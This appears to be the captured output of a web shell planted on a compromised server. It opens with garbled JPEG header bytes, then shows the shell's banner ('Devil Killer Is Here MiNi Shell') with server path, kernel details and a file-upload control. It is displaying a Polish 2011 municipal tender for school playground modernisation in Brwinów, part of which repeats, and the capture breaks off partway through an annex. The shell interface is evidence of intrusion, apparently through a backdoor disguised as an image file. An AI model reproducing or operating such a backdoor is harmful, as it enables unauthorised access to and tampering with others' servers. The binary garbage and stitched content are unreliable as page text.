JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/153177-N-2011.html

<p class="kh_header"><b>Brwinów: Modernizacja placów zabaw: w Zespole Szkół Nr 2 w Brwinowie, Zespole Szkół w Żółwinie - w ramach rządowego programu Radosna szkoła.

Część nr 1: modernizacja placu zabaw w Zespole Szkół Nr 2 w Brwinowie
Część nr 2: modernizacja placu zabaw w Zespole Szkół w Żółwinie</b><br>
<b>Numer ogłoszenia: 153177 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja placów zabaw: w Zespole Szkół Nr 2 w Brwinowie, Zespole Szkół w Żółwinie - w ramach rządowego programu Radosna szkoła.

Część nr 1: modernizacja placu zabaw w Zespole Szkół Nr 2 w Brwinowie
Część nr 2: modernizacja placu zabaw w Zespole Szkół w Żółwinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy przedmiotu umowy obejmuje:
CZĘŚĆ NR 1: modernizacja placu zabaw w Zespole Szkół Nr 2 w Brwinowie na terenie o pow. ok.650 m2
1.1. Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego Radosna Szkoła.
1.2.  Wykonanie przedmiotu zamówienia zgodnie ze normą PN-EN-1176 i PN-EN-1177.
1.3.  Oczyszczenie drzew z zagrażających oraz suchych konarów, które rosną na terenie pod plac zabaw lub w jego bardzo bliskim sąsiedztwie (teren położony jest od strony frontowej szkoły miedzy starodrzewem),
1.4. Przygotowanie terenu pod plac zabaw zgodnie ze sztuką budowlaną (wyrównanie terenu, usunięcie zbędnych, korzeni) podwyższenie powierzchni z zachowaniem spadków do odprowadzenia nadmiaru wilgoci, itp.) oraz:
- zdjęcie warstwy humusu o grubości ok. 40 cm,
- położenie warstwy tłucznia,
- położenie warstwy żwiru,
- położenie warstwy geowłókniny,
- położenie warstwy żwirku.
1.5. Położenie nawierzchni bezpiecznej pod nowe urządzenia spełniającej wymogi Polskich Norm  gumowej lub piankowej  amortyzujących upadek w kolorze pomarańczowym  ( pow.  ok. 240 m2 ) -  połączenie nawierzchni bezpiecznych ścieżką ( komunikacja )w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną  (pow. ok. 50 m2 )  Nawierzchnie  zgodnie z wymaganiami programu Radosna Szkoła. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 210  m2 .
1.6. Zakup, dostawa i montaż urządzeń: 
1) zestaw gimnastyczny o elementach ustawionych w kształcie wielokąta w skład, którego wchodzi min 6 elementów: np. przeplotnia, drążki gimnastyczne, lina do przeciągania, drążek trapezowy, pal wspinaczkowy, drabina pionowa .
2) zestaw sprawnościowo - rekreacyjny, w skład którego wchodzi min 8 elementów: np. drabina pionowa ze szczebelkami, pomost z daszkiem, zjeżdżalnia krótka z wejściem, pomost z daszkiem i zjeżdżalnią długą, mostek ruchomy, drabinka pozioma, wejście trapowe, wejście po drabince.
3) zestaw sprawnościowy o urządzeniach ustawionych w szeregu, w skład którego wchodzi: min. 5 elementów np. kratownica z drewna lub łańcuchów, drabina dwustronna, kółka, lina do wspinania, drabina pozioma- skośna, 
4) karuzela tarczowa,
5) huśtawka ważka, 
6) tablica informacyjna z regulaminem zgodna z wymogami Programu Radosna Szkoła.
1.7. Demontaż, renowacja i montaż istniejących urządzeń: 3 szt. podwójnych huśtawek, 1 zestaw rekreacyjny typu wieża, zestaw sprawnościowy (pociąg z wagonikami), 1 huśtawka typu ważka, zjeżdżalnia, dwie ławki.
Renowacja ma polegać na zdemontowaniu istniejących urządzeń, zabezpieczeniu ich przed wpływem czynników atmosferycznych, zabezpieczeniu części, które są w glebie specjalnymi nakładkami, wymianie lub naprawie części zużytych, pomalowaniu urządzeń i montażu ich w przeznaczone miejsce na placu zabaw.
1.8. Wieszak na odzież wolnostojący lub ścianka z wieszakami.
1.9. Min 2 szt. ławeczek,  kosze 2 szt.
Urządzenia powinny posiadać dominujący kolor niebieski oraz spełniać wymogi normy PN-EN-1176 i posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi. 
Zgodnie z wytycznymi MEN sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady. 
Urządzenia powinny być wykonane w dominującej ich części z drewna klejonego z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.

2. Zakres rzeczowy przedmiotu umowy obejmuje:
CZĘŚĆ NR 2: modernizacja placu zabaw w Zespole Szkół w Żółwinie pow. terenu ok. 280 m2
2.1. Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego Radosna Szkoła.
2.2. Wykonanie przedmiotu zamówienia zgodnie ze normą PN-EN-1176 i PN-EN-1177.
2.3. Planowane położenie:
Obszar przeznaczony na plac zabaw położony jest w części terenu szkoły: ograniczony z dwóch stron siatką ogrodzeniową, od zachodu graniczy z boiskiem do koszykówki / siatkówki o nawierzchni tartanowej, od południa bieżnią i piaskownicą do skoku w dal. Ma kształt czworokąta o wymiarach jak na rysunku. Całkowita powierzchnia - ok. 280 m2.  Porośnięty jest w całości trawą.
2.4. Położenie nawierzchni bezpiecznej pod urządzenia  spełniającej wymogi Polskich Norm gumowej lub piankowej amortyzujących upadek w kolorze pomarańczowym (pow. ok. 150m2) - połączenie nawierzchni bezpiecznych ścieżką  (komunikacja) w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną (pow. ok. 20 m2) Nawierzchnie  zgodnie z wymaganiami programu Radosna Szkoła. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 70 m2
2.5. Zakup, dostawa i montaż urządzeń: 
Wszystkie urządzenia mają umożliwiać bardziej prowadzenie z dziećmi zajęć ruchowych niż rekreację i zabawę.
Na placu planowane jest stworzenie 3 stref ćwiczeń: 
Obszar I   - Urządzenia do wykonywania przeplotów gimnastycznych tj. przeplotnia gimnastyczna
Obszar II  - Urządzenia do ćwiczenia równowagi i podciągania tj. zestaw gimnastyczny i ścieżka zdrowia
Obszar III - Urządzenia do wspinaczki - ściana wspinaczkowa łańcuchowa (system wspinania połączonych elementów).
 1) Obszar I - Urządzenia do wykonywania przeplotów gimnastycznych- tj. przeplotnia gimnastyczna.
Zestaw zręcznościowy służący do wspinania i przeplatania złożony z min 3 elementów np. przeplotnia pionowa w kształcie pajęczyny, przeplotnia linowa w kształcie siatki prostokątnej, komin linowy.
Elementy mogą być ze sobą połączone w linii prostej lub w postaci wieloboku (np. sześciokąta) typu małpi gaj, np. z  powtarzającymi się elementami wymienionymi powyżej. 
2) Obszar II - Urządzenia do ćwiczenia równowagi i podciągania: tj. zestaw gimnastyczny i ścieżka zdrowia.
Pojedyncze elementy ułożone w kształt ścieżki do balansowania min 6 elementów (wieloboku lub łamanej otwartej) np.: równoważnia huśtawka, równoważnia na sprężynach, równoważnia pochylnia, ew. talerzowe schodki (belka z osadzonymi na nie metalowymi talerzykami na różnych wysokościach), ew. lina do balansowania, słupki do slalomu lub do wchodzenia i zeskoków, płotki do przeskoków.
Elementy do podciągania: min. 2  np. drążki akrobatyczne lub  kółka akrobatyczne np.  drabinka skośna.
3) Obszar III - Urządzenia do wspinaczki, tj. ściana wspinaczkowa łańcuchowa (system wspinania połączonych elementów).
Zestaw zręcznościowy służący do wspinania złożony z min 4 elementów: np. ścianka wspinaczkowa lub drabinka skośna wspinaczkowo-szczeblowa, drabinka gimnastyczna  podwójna, drabinka linowa , lina do wspinaczki.
3 elementy mogą być połączone w kształt linii łamanej a ścianka do wspinaczki np. jako oddzielny element.

2.6. tablica informacyjna z regulaminem zgodna z wymogami Programu Radosna Szkoła.
2.7. Wieszak na odzież wolnostojący lub ścianka z wieszakami.
2.8. Min 2 szt. ławeczek, kosz 1 szt.

Zgodnie z wytycznymi MEN sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady. Urządzenia powinny być wykonane z bezpiecznych i trwałych materiałów oraz spełniać wymogi Polskich Norm i warunków bezpieczeństwa, tj. posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi,  wg norm EN-1176 i EN-1177.
Urządzenia powinny być wykonane w dominującej ich części z drewna klejonego lub metalu, stali z elementami z innych materiałów odpornych na warunki atmosferyczne, na stopach stalowych ocynkowanych, zakotwiczone w gruncie poprzez zabetonowanie.

3. Zamówienie w częściach 1 i 2 obejmuje także przygotowanie projektu zagospodarowania terenu na właściwych aktualnych mapach ewidencyjnych wraz z niezbędnymi załącznikami celem zgłoszenia placów zabaw do Starostwa Powiatowego w Pruszkowie. Zgłoszenia dokonuje wykonawca.
Place zabaw mają być przeznaczone dla dzieci w młodszym wieku szkolnym i dostosowane do ich potrzeb.
Przy każdym urządzeniu mają być zainstalowane czytelne tablice informacyjne pokazujące możliwości i sposób wykorzystania każdego urządzenia 
Regulamin określający zasady korzystania z placu zabaw musi spełniać wymogi programu Radosna Szkoła.

4. W celu potwierdzenia, że oferowane roboty i dostawy odpowiadają wymaganiom Zamawiającego Wykonawca załączy do oferty szczegółowy opis elementów wyposażenia placu zabaw wraz z ich kolorystyką (zgodnie z wytycznymi MEN)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;

2. W celu potwierdzenia, że oferowane roboty i dostawy odpowiadają wymaganiom Zamawiającego Wykonawca załączy do oferty szczegółowy opis elementów wyposażenia placu zabaw wraz z ich kolorystyką (zgodnie z wytycznymi MEN).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany podmiotu trzeciego (podwykonawcy), 
3)	w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki zewnętrzne (np. inne niezależne budowy),
4)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL. KOŚCIUSZKI 4A, Zespół ds. Zamówień Publicznych, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2011 godzina 11:00, miejsce: URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL. GRODZISKA12, pokój nr 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> modernizacja placu zabaw w Zespole Szkół Nr 2 w Brwinowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy przedmiotu umowy obejmuje:
CZĘŚĆ NR 1: modernizacja placu zabaw w Zespole Szkół Nr 2 w Brwinowie na terenie o pow. ok.650 m2
1.1. Przedmiot zamówienia należy wykonać zgodnie z wytycznymi Ministerstwa Edukacji Narodowej dotyczącymi programu rządowego Radosna Szkoła.
1.2.  Wykonanie przedmiotu zamówienia zgodnie ze normą PN-EN-1176 i PN-EN-1177.
1.3.  Oczyszczenie drzew z zagrażających oraz suchych konarów, które rosną na terenie pod plac zabaw lub w jego bardzo bliskim sąsiedztwie (teren położony jest od strony frontowej szkoły miedzy starodrzewem),
1.4. Przygotowanie terenu pod plac zabaw zgodnie ze sztuką budowlaną (wyrównanie terenu, usunięcie zbędnych, korzeni) podwyższenie powierzchni z zachowaniem spadków do odprowadzenia nadmiaru wilgoci, itp.) oraz:
- zdjęcie warstwy humusu o grubości ok. 40 cm,
- położenie warstwy tłucznia,
- położenie warstwy żwiru,
- położenie warstwy geowłókniny,
- położenie warstwy żwirku.
1.5. Położenie nawierzchni bezpiecznej pod nowe urządzenia spełniającej wymogi Polskich Norm  gumowej lub piankowej  amortyzujących upadek w kolorze pomarańczowym  ( pow.  ok. 240 m2 ) -  połączenie nawierzchni bezpiecznych ścieżką ( komunikacja )w kolorze niebieskim typu tartan lub inną nawierzchnia syntetyczną  (pow. ok. 50 m2 )  Nawierzchnie  zgodnie z wymaganiami programu Radosna Szkoła. Resztę terenu zagospodarować trawnikiem - pas zieleni min. 210  m2 .
1.6. Zakup, dostawa i montaż urządzeń: 
1) zestaw gimnastyczny o elementach ustawionych w kształcie wielokąta w skład, którego wchodzi min 6 elementów: np. przeplotnia, drążki gimnastyczne, lina do przeciągania, drążek trapezowy, pal wspinaczkowy, drabina pionowa .
2) zestaw sprawnościowo - rekreacyjny, w skład którego wchodzi min 8 elementów: np. drabina pionowa ze szczebelkami, pomost z daszkiem, zjeżdżalnia krótka z wejściem, pomost z daszkiem i zjeżdżalnią długą, mostek ruchomy, drabinka pozioma, wejście trapowe, wejście po drabince.
3) zestaw sprawnościowy o urządzeniach ustawionych w szeregu, w skład którego wchodzi: min. 5 elementów np. kratownica z drewna lub łańcuchów, drabina dwustronna, kółka, lina do wspinania, drabina pozioma- skośna, 
4) karuzela tarczowa,
5) huśtawka ważka, 
6) tablica informacyjna z regulaminem zgodna z wymogami Programu Radosna Szkoła.
1.7. Demontaż, renowacja i montaż istniejących urządzeń: 3 szt. podwójnych huśtawek, 1 zestaw rekreacyjny typu wieża, zestaw sprawnościowy (pociąg z wagonikami), 1 huśtawka typu ważka, zjeżdżalnia, dwie ławki.
Renowacja ma polegać na zdemontowaniu istniejących urządzeń, zabezpieczeniu ich przed wpływem czynników atmosferycznych, zabezpieczeniu części, które są w glebie specjalnymi nakładkami, wymianie lub naprawie części zużytych, pomalowaniu urządzeń i montażu ich w przeznaczone miejsce na placu zabaw.
1.8. Wieszak na odzież wolnostojący lub ścianka z wieszakami.
1.9. Min 2 szt. ławeczek,  kosze 2 szt.
Urządzenia powinny posiadać dominujący kolor niebieski oraz spełniać wymogi normy PN-EN-1176 i posiadać stosowne certyfikaty bezpieczeństwa i dopuszczenia do stosowania w kontakcie z dziećmi. 
Zgodnie z wytycznymi MEN sprzęt powinien posiadać co najmniej 3-letni okres gwarancji jakości i rękojmi za wady. 
